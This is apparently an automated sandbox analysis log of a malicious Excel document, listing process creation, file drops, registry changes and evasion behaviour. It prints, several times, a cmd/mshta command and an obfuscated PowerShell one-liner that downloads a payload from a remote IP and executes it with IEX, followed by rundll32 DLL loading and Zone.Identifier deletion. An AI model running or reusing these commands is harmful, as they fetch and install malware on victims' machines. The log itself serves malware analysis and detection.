                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyE
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvn
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zzx/ccv/fe.htmlJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyStringJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyStringJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvnJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDF37.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002D5988 CreateToolhelp32Snapshot,15_2_002D5988
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: ;.PDB source: powershell.exe, 00000006.00000002.672109254.000000000027A000.00000004.00000020.00020000.00000000.sdmp
                            Source: 41B1.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_02E600C0 push 8B4902A7h; iretd 4_3_02E600C6
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_02E608C9 push 8B4902A7h; iretd 4_3_02E608CE
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_02E600C0 push 8B4902A7h; iretd 4_3_02E600C6
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_02E608C9 push 8B4902A7h; iretd 4_3_02E608CE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F0C04 push ss; ret 12_2_003F0E40
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F0F14 push FFFFFFF8h; retf 12_2_003F0F23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: ssd.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x91e13
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Documents\ssd.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox (copy)Jump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 2408Thread sleep time: -360000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FF00250DFC sldt word ptr [eax]6_2_000007FF00250DFC
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32094
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32094
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: mshta.exe, 00000004.00000003.417270436.0000000003188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: rundll32.exe, 0000000C.00000002.538321202.000000000046A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002D7E00 FindFirstFileW,15_2_002D7E00
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A4087 mov eax, dword ptr fs:[00000030h]9_2_007A4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00234087 mov eax, dword ptr fs:[00000030h]10_2_00234087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00344087 mov eax, dword ptr fs:[00000030h]11_2_00344087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003E3487 mov eax, dword ptr fs:[00000030h]12_2_003E3487
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00364087 mov eax, dword ptr fs:[00000030h]12_2_00364087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B4087 mov eax, dword ptr fs:[00000030h]13_2_002B4087
